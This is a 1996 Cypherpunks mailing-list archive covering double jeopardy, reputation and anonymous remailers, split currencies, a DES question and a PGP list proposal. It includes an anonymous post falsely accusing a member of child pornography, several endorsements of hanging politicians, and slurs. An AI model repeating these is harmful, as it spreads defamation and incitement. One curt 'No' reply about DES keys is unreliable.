Would their peers be >the people in Simi Valley, where many or most of them live? Or would it >be more appropriate to have a jury of the victims' peers? Or both? More importantly, what's happened to "double jeopardy"? The four cops were found "Not Guilty" in their criminal trial (or at least three of them were...I forget the details--one may have been a mistrial). So, as some people then proceeded to burn down their neighborhoods, loot, and run amok in the streets for several days, a _second_ trial was held. This time the verdicts were more in line with what the street wanted, plus, all the good electronics stores had already been looted or had moved out of South Central, so no riots. (Legal purists will point out that the second trial was for "Federal civil rights violations." Harummphh. What would the Founders think of this logic: "First we try them on ordinary criminal charges. If they are found Not Guilty, we charge them in the next higher court with more abstract charges. If they are still found Not Guilty, we hit them with "civil rights" and "being disrespectful to women" charges. And if that doesn't work, we charge them in the World Court. We've only had one guilty party get past them, and for that guy we appealed to the Pope and he put a Papal Hex on the guy and ordered him burned in oil.") Double jeopardy means the system gets one shot at proving charges, not two or three. (And, yes, even though I am sure O.J. Simpson killed those two people, I am not happy with what appears to be a _second_ trial. For sure, it's a _civil_ trial, for damages, but to this layman it looks like a second trial on the main charges. I suppose I always thought that being found "Not Guilty" on the act itself made it essentially impossible for a civil trial to redecide the same issue. Boy, was I wrong.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C.
May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From sandfort at crl.com Mon Sep 30 14:53:57 1996 From: sandfort at crl.com (Sandy Sandfort) Date: Tue, 1 Oct 1996 05:53:57 +0800 Subject: POLL RESULTS Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, Last week I offered an informal poll as to the reputational effect of "John Anonymous MacDonald" and other apparent nyms. I received responses from 31 of you. All were signed by known Cypherpunks; none were anonymous. I was not surprised to find absolutely zero respect for "Anonymous." In addition, there were no negative comments about Tim and in most cases, high marks for his restraint and dignity under the circumstances. Perhaps not so surprisingly, a significant number of you expressed the belief that the "Anonymous" posts come from Demetri Vulis. Following, are a few samples of what respondents had to say. (They are reproduced without attribution because I had not asked permission to do so in my original poll request.) S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Clearly, John Anonymous MacDonald is losing points. Tim's reputation is unaffected. ... I'd be surprised if anyone regarded Anonymous with any degree of respect anymore. As for Tim May, he already had a good rep in my book to start with, and by not responding in a similar matter (at least not publicly) to these people, his reputation is enhanced even more. ... Who is John Anonymous MacDonald...We can only surmise that his real joy is playing with himself in public. ...
Anonymous is a total moron who'd be annoying me greatly if I hadn't managed a decent killfile. ... The posts are idiotic and childish, and reflect quite badly on the sender (presumably Dmitri Vulis KOTM). If anything, they provide a reason to pay *more* attention to tcmay. ... As with any public display of poor taste, anonymous shows themselves lacking in judgement. I credit Tim for not responding. ... I personally think that these anonymous attacks are pointless. They are just stupid insults, and they don't do anything negative to Tim's reputation except show that someone likes abusing remailers. Perhaps Tim's reputation may get enhanced by the fact that someone has to go this low to debase him. ... It seems to me that anyone who is unwilling to allow the abused party to respond personally is undeserving of anyone's respect. To feel the need to do it in a public forum with however many thousands of people are on these lists is a sign of insecurity and weakness... ... Tarnished - John Anonymous MacDonald Enhanced - Tim May (due to his restraint!) ... Tim's reputation is definitely being enhanced, if it's fair to judge a man by the enemies he keeps. ;) ... ...Since these annoying posts started a week or so ago, I have (for the first time ever) begun killfiling people and messages on the cp list. Right now I am killing all messages from John Anonymous MacDonald, Dmitri Vulis, and any message in the "daily ... regarding TCM" thread(s). I hope this madness can end, so we can get back to more normal traffic levels on the list. ... Dimitri 'Anonymous' Vulis' reputation has gone way out on the negative side. (He's been an obvious nutcase from the start...) TC May's positive reputation has increased from his handling of these attacks. ... This kind of post shows Anonymous to be at the social level of a grade school child. If s/he grows up, I may change my mind. It does nothing to affect my opinion of Tim May... Anonymous is making a public mockery of him/herself. ...
The anono-twits lose by a mile.... ...It's not much different from graffiti - some people put up interesting posters on walls and telephone poles, and write interesting stuff on bathroom walls; others scrawl empty vulgarity... ... Anonymous's reputation went instantly from 0 to negative infinity. Tim May's reputation is unaffected. ... It certainly does nothing to harm Tim's reputation, from where I stand. Thank God for procmail! ... Well, as Tim has managed to sit back and take it, and I've killfiled the main perpetrators. I'd say it makes a public mockery of Anonymous. ... ...it seems evident that some non-anonymous posters aka KTOM seem to understand how to *abuse* our American freedoms but don't understand about *responsible* use. Is this a deliberate attempt to damage this list or is it that some folk just can't handle freedom? ... ...I killfile Foolish Voolish and most of the others, just because of these ridiculous ad hominem attacks on Tim. ... Anonymous' claims make him look stupid simply because they have no technical or political message - just dirty words...Tim May's reputation is enhanced, I think, by the fact that *other people* come in and dispute Anonymous' claims, over and over again.
From rah at shipwright.com Mon Sep 30 14:57:13 1996 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 1 Oct 1996 05:57:13 +0800 Subject: Diffie Speaks at Sun: "Cryptology, Technology, and Politics" Message-ID: --- begin forwarded text From: Rich Lethin Date: Fri, 27 Sep 1996 15:06:20 -0400 To: rah at shipwright.com Subject: [joei at hq.lcs.mit.edu: DLS -- the first one this year] Date: Fri, 27 Sep 1996 14:34:24 -0400 To: seminars at lcs.mit.edu, help-teach at hq.lcs.mit.edu, eecsfaculty at eecs.mit.edu From: joei at hq.lcs.mit.edu (Joei Juanita Marshall) Subject: DLS -- the first one this year DISTINGUISHED LECTURER SERIES DATE: October 17, 1996 TIME: 3:15 - Refreshments 4:00 - Lecture PLACE: MIT, Building 34, Room 101, Vassar St., Cambridge, MA "Cryptology, Technology, and Politics" Dr. Whitfield Diffie Distinguished Engineer Sun Microsystems, Inc. October 17, 1996 Abstract: From World War I on, interception of communications took its place beside traditional human intelligence as a vital implement of state power. Over the past two decades, a combination of falling costs and new technologies have made high-grade cryptography widely available. This threatens many communications intelligence sources --- though probably not communications intelligence itself. The result has been a series of panicky government attempts to control the spread of cryptographic technology. As long as individuals have access to computers that really `work for them,' such attempts are unlikely to succeed. The opponents of cryptography may, nonetheless, damage both our democracy and our economy with their efforts.
Host: Professor Michael Dertouzos Joei Juanita Marshall Massachusetts Institute of Technology Laboratory for Computer Science 545 Technology Square NE43-104 Cambridge, MA 02139 Phone: (617) 253-0145 Fax: (617) 258-8682 --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From tcmay at got.net Mon Sep 30 15:24:09 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 1 Oct 1996 06:24:09 +0800 Subject: POLL RESULTS In-Reply-To: Message-ID: While I didn't respond to Sandy's poll, for the obvious reason plus the reason I use to almost never respond to polls, I'm not surprised at the results. Most of us learn as children that "name calling" is rarely an effective debating technique, and responding to such name calling even less so. (It may be that non-Americans, judging from several recent examples, are not exposed to the "sticks and stones" meme, and assume childish name-calling is effective debate.) A few years ago, when Detweiler was unable to convince people about his points by use of logic, he fell into this path, and ranted on and on for several months, before finally either burning out or having enough accounts yanked for abuse. I think not getting responses from me was what angered him the most. Interesting that Detweiler returned with a _Russian_ nym. Whether Vulis will burn himself out is unclear. Judging by his "spit" page, http://206.124.65.1:80/netscum/, I rather imagine he has a years-long supply of bile stored up. Must have been those cold Russian winters. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. 
May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From haystack at cow.net Mon Sep 30 15:28:12 1996 From: haystack at cow.net (Bovine Remailer) Date: Tue, 1 Oct 1996 06:28:12 +0800 Subject: [ADMINISTRATIVIUM] A daily warning regarding Tim C. May Message-ID: <9609301727.AA25963@cow.net> Embedded in Tim C. May's babblings are preposterous lies, wild distortions, child pornography (both as graphic descriptions and in JPEG format), ethnic slurs, and racial epithets. From byrd at acm.org Mon Sep 30 15:28:35 1996 From: byrd at acm.org (Jim Byrd) Date: Tue, 1 Oct 1996 06:28:35 +0800 Subject: Looking for Qualified Individual/Firm to Contract for Cryptanalysis Message-ID: <2.2.32.19960930161624.006f43b0@super.zippo.com> At 07:00 AM 9/30/96 -0700, thad at hammerhead.com (Thaddeus J. Beier) wrote: > >I saw this > >> > I am looking for one or more people (or firms) who are qualified to perform >> > world class cryptanalysis work. Please send mail to me at joswald1 at msn.com >> > call in the U.S. at +1 408.479.7874 >> > >> > Jack Oswald > >and then this... > [news about Grady Ward, and the Scientology cult's attempt to decrypt his files] > >The trial is happening in San Jose, and I wouldn't be at all surprised >if the attempted cryptanalysis is happening there, too. They've been >working at it for a few months now. Not necessarily. The answering machine at the phone number listed mentions "RPK" as the company, and this company has non-Grady reasons for looking for these skills. >From their web page at http://crypto.swdev.co.nz/: "The RPK public key cryptosystem provides industrial-strength public key cryptography that's available worldwide. 
" "You'll find full technical information, free evaluation software and development tools, and details of our SafeCracker Challenge program where you can earn a $$$ REWARD $$$ while trying to put us out of business! " They could just be looking for people to test their own stuff. From terpsrw at wabe.network.com Mon Sep 30 15:29:09 1996 From: terpsrw at wabe.network.com (Randall Terpstra) Date: Tue, 1 Oct 1996 06:29:09 +0800 Subject: Looking for Qualified Individual/Firm to Contract forCrypt analysis Message-ID: <324FF9DB@mnbp.network.com> Nice try bimbo--- 408 is San Jose!! RWT ---------- From: cypherpunks-errors[SMTP:cypherpunks-errors at toad.com] Sent: Saturday, September 28, 1996 3:58 PM To: cypherpunks Subject: Re: Looking for Qualified Individual/Firm to Contract forCryptanalysis Julian Assange writes: > > I am looking for one or more people (or firms) who are qualified to perform > > world class cryptanalysis work. Please send mail to me at joswald1 at msn.com > > call in the U.S. at +1 408.479.7874 > > > > Jack Oswald > > > > Find your father's little black book under the couch? Well, I dialed the number out of curisotity (it's in San Diego). The answering machine says "This is Jack Oswald with R.P.K." Sounds gay. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From mwohler at ix.netcom.com Mon Sep 30 16:44:45 1996 From: mwohler at ix.netcom.com (Marc J. Wohler) Date: Tue, 1 Oct 1996 07:44:45 +0800 Subject: active practice in America Message-ID: <199609301839.LAA05232@dfw-ix11.ix.netcom.com> At 08:45 AM 9/30/96 -0800, you wrote: >At 11:32 PM -0700 9/29/96, Dale Thorn wrote: > >(Legal purists will point out that the second trial was for "Federal civil >rights violations." Harummphh. What would the Founders think of this logic: I am sure you know the reason for the 'civil rights violation laws. 
In the 50's & early 60's, all while jury's in the deep south refusing to convict obviously guilty white defendants of rape and murder against blacks. What would be *your* remedy in such cases. From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 30 16:47:33 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Tue, 1 Oct 1996 07:47:33 +0800 Subject: Algeria & Censorship Message-ID: <01IA3G4IAXWW8Y57AQ@mbcl.rutgers.edu> While I agree with the Algerian military in preventing an Islamic Fundamentalist takeover (it's one of my examples of situations in which democracy goes wrong), I definitely don't support many of their other actions. Lesser of two evils... -Allen > _________________________________________________________________ > PC Travel > _________________________________________________________________ > SUSPENDED ALGERIAN DAILY OFFERED INTERNET PAGE > __________________________________________________________________________ > Copyright © 1996 Nando.net > Copyright © 1996 Reuter Information Service > PARIS (Sep 30, 1996 1:24 p.m. EDT) - A press freedom watchdog on > Monday offered the suspended Algerian daily La Tribune a page on its > Internet site to give it an airing during the six-month ban. > "Thanks to this initiative, these journalists, banned from writing by > the Algerian authorities, will be able to practice their trade again," > the Paris-based Reporters without Borders (RsF) said. > An Algiers court suspended La Tribune for six months on September 3 > over a cartoon mocking the Algerian flag. [...] > Fifty-seven journalists have been murdered by suspected rebels. RsF > said authorities had suspended or seized newspapers on 55 occasions > and 23 journalists had been held for more than 48 hours since the > conflict broke out over the 1992 cancellation of a general election > fundamentalists were poised to win. > Copyright © 1996 Nando.net From tcmay at got.net Mon Sep 30 16:49:15 1996 From: tcmay at got.net (Timothy C. 
May) Date: Tue, 1 Oct 1996 07:49:15 +0800 Subject: active practice in America In-Reply-To: <199609301839.LAA05232@dfw-ix11.ix.netcom.com> Message-ID: At 2:42 PM -0400 9/30/96, Marc J. Wohler wrote: >At 08:45 AM 9/30/96 -0800, you wrote: >> >>(Legal purists will point out that the second trial was for "Federal civil >>rights violations." Harummphh. What would the Founders think of this logic: > >I am sure you know the reason for the 'civil rights violation laws. > >In the 50's & early 60's, all while jury's in the deep south refusing to >convict obviously guilty white defendants of rape and murder against blacks. > >What would be *your* remedy in such cases. Certainly not throwing out the principle of double jeopardy, that a man should only be tried once for the same alleged crime. As for my "remedy," not all injustices can be righted. (The O.J. trial was a case of a mostly-black jury refusing to convict an obviously guilty black defendant....and yet I don't hear calls for a _second_ criminal trial.) As for the historical reasons for the "conspiracy to not take seriously the civil rights of an aggrieved minority" nonsense, isn't it about time to roll back such laws? Whatever the putative justification for such things might have been 30-40 years ago, this is now, that was then. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 30 16:49:42 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. 
Allen Smith) Date: Tue, 1 Oct 1996 07:49:42 +0800 Subject: Not reputation again! (Was: The Nature of the Cypherpunks List) Message-ID: <01IA3ETGL27Y8Y57AQ@mbcl.rutgers.edu> From: IN%"gregburk at netcom.com" 25-SEP-1996 07:25:48.98 >You could contend that the Poster With Nothing Better To Do's reputation >is balanced precariously at exactly 0. I would find that a big stretch, >and as above, if that's 0, what's negative? A fully anonymous individual (not a pseudonym or otherwise trackable individual) is inevitably going to have a reputation of 0. It can't be negative; that would be saying that I could flame myself via remailers and _increase_ my reputation if I did it properly. The person can't exactly build up a reputation of above 0, since that would require multiple good postings and/or some form of escrow. -Allen From aaron at herringn.com Mon Sep 30 16:54:05 1996 From: aaron at herringn.com (aaron sommer) Date: Tue, 1 Oct 1996 07:54:05 +0800 Subject: Internet 'terrorism' newsclips [CYPHER, but news] Message-ID: [article in Parade] Love that in-depth technical reporting. >And from another piece of hard-hitting quote-the-official-source journalism >in PARADE, "A New Worry: Terrorism in Cyberspace" [snip] > > >>There were more than 250,000 attacks on Department of Defense computers >last >>year, and 65% were successful. Little is known about who launched them, >why, or >>what they found. In a recent test, Defense Department "red teams" admit to >>intentionally hacking into 18,200 systems, with only 5% of the attacks >>detected; only 27% of those attacks were reported. > >Wonder if the timing of these stories has anything to do with the end of >term legislative push on wiretapping. They're recycling an old USA Today piece. Turns out that figure was extrapolated by an internal investigation team trying to break into unclassified/non-secure systems. 
They just took the success rate for their attacks and multiplied it by an arbitrary number to come up with an "annual" rate, according to the USA Today article. From tcmay at got.net Mon Sep 30 16:55:02 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 1 Oct 1996 07:55:02 +0800 Subject: Katz on cypherpunks, in HotWired's Media Rant In-Reply-To: Message-ID: At 9:06 AM -0700 9/30/96, Declan McCullagh wrote: >[Background: the cypherpunk/pw:cypherpunk account used for HotWired's >Threads discussion section has been used for anonymous flaming and >attacks. --Declan] > > Linkname: The Netizen - Media Rant - Jon Katz > URL: http://www.netizen.com/netizen/96/40/katz0a.html Katz has no understanding of the difference between someone (or some bunch) who use a name-password combination called "cypherpunks" with the discussions on the _list_ called cypherpunks. His comment, "Cypherpunks don't want real confrontations or discussions, or they would reveal their identities and make it possible to respond, as most flamers do. They are among media's rarest and at the same time most easily recognized subspecies: nihilists." shows the same level of sophistication as someone accusing Bill Clinton of misdeeds because "whitehouse.gov" is used as a name/password for some forum. Someone this naive (or this disingenuous, if he knows better) has no business writing for anything about the Net. Once again, "Wired" and "HotWired" disgrace themselves. --Tim May >HotWired >The Netizen >30 Sep 96 > >[...] > > In addition, the digital culture has long been demonized by the > outside world and is inherently defensive and edgy. > > Cypherpunks give us fascinating insights into this subject, since > their equivalent exists in no other medium, and they epitomize the > often mindless verbal violence that characterizes some parts of the > Net.
Their original purpose - techno-anarchy and advocating unfettered > access to information - conflict head-on with the Web's mainstreaming > and the arrival of the newly wired middle class. > > Cypherpunks don't want real confrontations or discussions, or they > would reveal their identities and make it possible to respond, as most > flamers do. They are among media's rarest and at the same time most > easily recognized subspecies: nihilists. > > Anonymous communication makes verbal violence easy. Since most flamers > don't know their targets and won't ever meet them, it's easy enough to > attack individuals and question personal motives, with none of the > social consequences of face-to-face verbal assaults. > > And Net communication also offers no filter: because it's > instantaneous, people often don't take the time to cool off, reflect, > or take another look at the messages they mail and post. > > When tempers flare here, it doesn't even take the time of a phone call > to pop off. So, hostile messages are often impulsive and frequently > regretted, apologized for, or taken back and clarified. > > Since the Net makes communication so easy, it makes corrections, > criticism, and discussion inevitable. Nobody who writes or posts on > the Web should expect anything less than sustained and continuous > challenge and critique, something that is rarely permitted in > mainstream journalism. Web writers and posters have to see these as > integral to their work - not simply attacks - and as healthy antidotes > to conventional media arrogance and elitism. > > Accompanying the hundreds and hundreds of personally assaultive > messages I've gotten - as opposed to the thousands of simply critical > ones - there is a strange and recurring phenomenon: If you respond > quickly and respectfully, the overwhelming majority of hostile > emailers either apologize, change their tone, or write back in a more > reflective, serious, or friendly way. 
Most of these posters are > stunned that anyone read their mail in the first place, or, even more > amazingly, responded to it. > >[...] We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From dlv at bwalk.dm.com Mon Sep 30 16:56:41 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 1 Oct 1996 07:56:41 +0800 Subject: the theory of split currency In-Reply-To: <199609301523.LAA15152@jekyll.piermont.com> Message-ID: "Perry E. Metzger" writes: > > > Is there a name for a dual or split currency, in which > > there is one currency for domestic use and another, different > > appearing, currency for foreign usage? > > I don't know of such a name, however... > > > Does anyone know of any country which has had such a > > split currency? > > ...this has been a common situation, in fact. South Africa, China, the > Soviet Union, and other unpleasant places have repeatedly done > this. Its usually a remarkably stupid idea. > > Perry Several Western European countries had such split currencies after WW II. Belgium's two francs have almost been phased out. Spain is the only major country with two currencies (ESP and ESB). They actually fetch slightly different interest rates. Chile introduced 'unidad de fomento' a while back, and many other minor players do something similar. 
--- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From travis at evtech.com Mon Sep 30 16:57:25 1996 From: travis at evtech.com (Travis Hassloch x231) Date: Tue, 1 Oct 1996 07:57:25 +0800 Subject: The Nature of the Cypherpunks List In-Reply-To: <199609241913.PAA19989@jekyll.piermont.com> Message-ID: <199609302011.PAA15378@tahiti.evtech.com> In message <199609241913.PAA19989 at jekyll.piermont.com> you write: > Timothy C. May writes: > > While some folks would rather we talked only about "crypto," just how many > > times can basic questions about Diffie-Hellman, or RSA, or elliptic curves > > be discussed? > > Sure, there is a limit to what can be said about cryptography and the > direct politics of cryptography. *THAT IS THE POINT*. That is why I'm > starting a new list -- so that I can abandon this waste heap to those > that like frolicking in the mire. here here. 400 messages in less than a week, with no digest, no moderated equivalent and no explanation for the "-ratings" list? who has time for that? i'm interested in crypto but i have a hard time believing any serious researcher could sift through all the messages and still have time left to eat & breathe, much less code! goodbye (again!) cypherpunks list! i had hoped things had changed in the last 2+ years but i guess not. as far as i'm concerned if it generates > 10 emails a day i'd have to justify reading it to my employers, or cut back on my coding at home, neither of which is likely to happen :) i am interested in any alternatives, cypherpunks readers... other mailing lists that are serious about crypto, security, etc. wasn't there talk at one time of a list for coders? can anyone remind me of what happened to it or where it exists now? 
From snow at smoke.suba.com Mon Sep 30 17:00:30 1996 From: snow at smoke.suba.com (snow) Date: Tue, 1 Oct 1996 08:00:30 +0800 Subject: [AP] Afghanistan In-Reply-To: Message-ID: <199609301804.NAA00350@smoke.suba.com> > > Afghanis publicly hanged their former president, Najibullah [no last name]. > Other countries should follow their example. One of my other .sigs: Think Globally. Act Locally. Support your Local Politician. With a rope. 4 lines, it isn't the law, it is simple fire prevention. Pain is a feature, not a bug. petro at suba.com petro at encodex.com petro at netsight.net petro at smoke.suba.com Petro, Christopher C. petro at suba.com snow at smoke.suba.com From deviant at pooh-corner.com Mon Sep 30 17:00:44 1996 From: deviant at pooh-corner.com (The Deviant) Date: Tue, 1 Oct 1996 08:00:44 +0800 Subject: the key of DES In-Reply-To: <199609301017.UAA04791@ssrnet.snu.ac.kr> Message-ID: On Mon, 30 Sep 1996, Kim Yoonjeong wrote: > Hello, all ! > With given a unknown DES system with 64 bits plaintext p, ciphertext c, > can there be MORE THAN ONE keys ? No. > If so, How is the probability (big or small)? > > Sincerely, > - Yoonejong > > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > Yoonjeong Kim Email: yjkim at ssrnet.snu.ac.kr > Department of Computer Engineering Phone: +82-2-875-7726 (office) > Seoul National University +82-2-872-9801 (home) > Seoul 151-742 Korea Fax: +82-2-875-7726 > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > > > --Deviant "If you eliminate the impossible, whatever remains, however improbable, must be true." 
-- Spock

From snow at smoke.suba.com Mon Sep 30 17:01:52 1996
From: snow at smoke.suba.com (snow)
Date: Tue, 1 Oct 1996 08:01:52 +0800
Subject: Public Schools
In-Reply-To:
Message-ID: <199609301822.NAA00388@smoke.suba.com>

> On Sat, 28 Sep 1996, Adamsc wrote:
> able to learn from their experiences, and will probably find working for
> them less frustrating than working for a "Dilbert Zone" manager. Sooner
> or later, though, you will encounter Dilbert's boss in the workplace, and
> not everyone can leave to become a famous cartoonist. You may need to

Well, there is always AP.

> become (eeek!) a technical manager. You won't fare well if you've
> completely neglected those non-technical skills. You'll be forced to
> communicate with mundanes ...
> Work to succeed in that creative writing course. Someday you will have a
> Great Idea, and no matter how well you know you can implement the Great
> Idea, you will need to convince others to believe, too. You will need
> funding, or staffing, or equipment, and you will need to make others
> understand the Great Idea, even if they do not have the technical
> background to do so. You will be a sad and frustrated individual if you
> cannot convince them.

You get hold of a technical writer, explain it to them (they are used to translating geek to mundane).

> Pack in all the math and comp sci you can, but take a real English course
> or two, and not "pocket protector comp. 101", either. Dabble in eastern
> philosophy, art history, or whatever catches your fancy, and see a bit of
> the world outside the computer lab. Your technical skills will take you
> much farther if you can understand their impact on the world. Good luck.

While this is all true, most of it could be acquired in a competent High School.

Petro, Christopher C.
petro at suba.com
snow at smoke.suba.com

From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 30 17:02:25 1996
From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith)
Date: Tue, 1 Oct 1996 08:02:25 +0800
Subject: Encrypted lists and ease of use
Message-ID: <01IA3FDVFUWO8Y57AQ@mbcl.rutgers.edu>

Where was the information on PGPdomo? That would seem appropriate for the input end, at least.
-Allen

From: IN%"scs at lokkur.dexter.mi.us" 26-SEP-1996 17:26:10.69
Subj: Encrypted lists and ease of use

I'm considering sending someone off to work on a project, but wanted to sanity-check the idea and see if someone already has something similar.

Recently I've been involved in a number of small (30 people or less) mailing lists which occasionally use PGP for encrypted mail. The hassle comes when one is encrypting a message to the list. With people coming and going, remembering who is on what list is impossible. We're always having to go back and re-send to someone who was left off of the encryption list.

What I propose to do is have a second list, list-encrypted at host, for every list at host. Any mail sent to the list simply goes out in plaintext. List-encrypted is encrypted for everyone on list, then sent to the list with appropriate additional headers.

To secure the mail as it travels from the sender to list-encrypted, we want to establish a public key for list-encrypted. All mail to the list *must* travel with the public key or be rejected.

When mail arrives at list-encrypted, a daemon will process it. The daemon knows the secret key for -encrypted, and has a list of who is on what list. The daemon strips the -encrypted address, encrypts the message for all on the list. If there are other people on the To: or Cc: fields, the daemon will encrypt for them as well. If any of this fails, the message is sent to as many as possible and notification failure goes back to the original sender indicating who the failures were. The daemon then forwards it to the real list. It preserves the From: field, but changes `To: list-encrypted' into simply `To: list.'

Comments? Generally useful? Beta volunteers?
:-)
--
"Yea, the heavens shall open and the NP-complete solution given forth. ATT executives shall give birth to two-headed operating systems, and copyrights shall be expunged. The voice of the GNU shall be heard, but the faithless will be without transceivers." -- me

From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 30 17:05:04 1996
From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith)
Date: Tue, 1 Oct 1996 08:05:04 +0800
Subject: More proposals for European censorship
Message-ID: <01IA3E9U6S948Y57AQ@mbcl.rutgers.edu>

From: IN%"trei at process.com" 24-SEP-1996 07:54:10.53

>Or are you suggesting that this particular gang of sub-humans was
>exposed at this time in an attempt to influence policy, implying that
>the Belgian LEAs knew about, but did not stop the ring until they
>needed a publicity coup?

How about "The LEAs put more effort into solving cases which can get a political benefit than ones that don't"? Given limited police resources (fortunately), they've got to prioritize somehow... and given politically-appointed higher-ups, some form of concentration on helpful-publicity cases is inevitable.
-Allen

From Ryan.Russell at sybase.com Mon Sep 30 17:10:30 1996
From: Ryan.Russell at sybase.com (Ryan Russell/SYBASE)
Date: Tue, 1 Oct 1996 08:10:30 +0800
Subject: Utah as a Religious Police State
Message-ID: <9609301838.AA26264@notesgw2.sybase.com>

A couple of people have pointed out what he was talking about, one of which is below. I haven't been able to find an article on the web that does more than reference the event. I'll try to hunt up one of the books. If anyone cares, I'll post what I find later.

Ryan

---------- Previous Message ----------
To: cypherpunks
cc:
From: mirele @ xmission.com ("Deana Holmes") @ smtp
Date: 09/30/96 06:53:41 AM
Subject: Re: Utah as a Religious Police State

On 29 Sep 96 at 17:36, Ryan Russell/SYBASE wrote:

> Hmm...never heard that one before. Care to produce
> a reference?
>
> (Or am I supposed to be ignoring this guy when he
> makes ridiculous claims?)
>
> Ryan

I suspect that Dmitri is referring to the Mountain Meadows Massacre. It's not a pretty story and is one of the low points of Mormon history. The late historian Juanita Brooks wrote about the massacre, and about the leader, John D. Lee, in a couple of books.

> ---------- Previous Message ----------
> To: cypherpunks
> cc:
> From: dlv @ bwalk.dm.com (Dr.Dimitri Vulis KOTM) @ smtp
> Date: 09/29/96 05:54:09 PM
> Subject: Re: Utah as a Religious Police State
>
> Ryan Russell/SYBASE writes:
> > I guess that depends on your definition of liberty. The Mormons
> > originally moved there to have a place to practice their religion,
> > and have freedom from persecution. I suppose one could extend that
> > to wanting a place to have the freedom to have a set of rules consistent
> > with their beliefs. Should that include freedom from interference from
> > folks such as yourself who want to change their rules, even though
> > you're not presently affected?
>
> It's worth noting that one of Utah mormons favorite pastimes was to ambush
> the settlers heading for California, kill them all, and take their property.
> However the mormons were dealt with much less severely than the local Indians
> who tried the same tricks. Pity.

===end vulis rant===

Deana

Deana M. Holmes
April 1996 poster child for clueless $cientology litigiousness
alt.religion.scientology archivist since 2/95
mirele at xmission.com

From rjasonc at pobox.com Mon Sep 30 17:14:27 1996
From: rjasonc at pobox.com (rjasonc)
Date: Tue, 1 Oct 1996 08:14:27 +0800
Subject: Minor wording error in Snake Oil FAQ
Message-ID:

>Date: Mon, 30 Sep 96 11:05 EST
>From: "Robert S. Powers" <@mcimail.com>
>To: rjasonc
>Subject: Wording error in your email
>
>Minor wording error. Your paragraph:
>
> random session  This is a temporary key that is generated specifically for
> key             one message. Typically, in public key cryptosystems, the
>                 message to be sent is encrypted with a symmetric key that
>                 was specifically generated for that message. The encrypted
>                 version of that message, as well as the associated session
Wording error here > <
>                 key can then be encrypted with the recipient's public key.
>                 When the recipient decrypts the message, then, the system
>                 will actually decrypt the message it gets (which is the
>                 ciphertext message and the symmetric key to decrypt it),
>                 and then use the symmetric key to decrypt the ciphertext.
>                 The result is the plaintext message. This is often done
>                 because of the tremendous difference in the speed of
>                 symmetric vs. asymmetric ciphers.
>
>
>...says that BOTH the message and the secret key are encrypted
>using the public key system. I'm sure it's just a wording error;
>but clearly the public key system is NOT generally used to encrypt
>the full message. That would take too long, as you point out;
>and that's why the secret key is used at all!
>
>bp

From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 30 17:22:56 1996
From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith)
Date: Tue, 1 Oct 1996 08:22:56 +0800
Subject: Lucent & Internet Phone
Message-ID: <01IA3GPHPQ9O8Y57AQ@mbcl.rutgers.edu>

> _________________________________________________________________
> PC Travel
> _________________________________________________________________
> LUCENT VOWS TO MAKE INTERNET PHONES EASY TO USE
> __________________________________________________________________________
> Copyright © 1996 Nando.net
> Copyright © 1996 Reuter Information Service
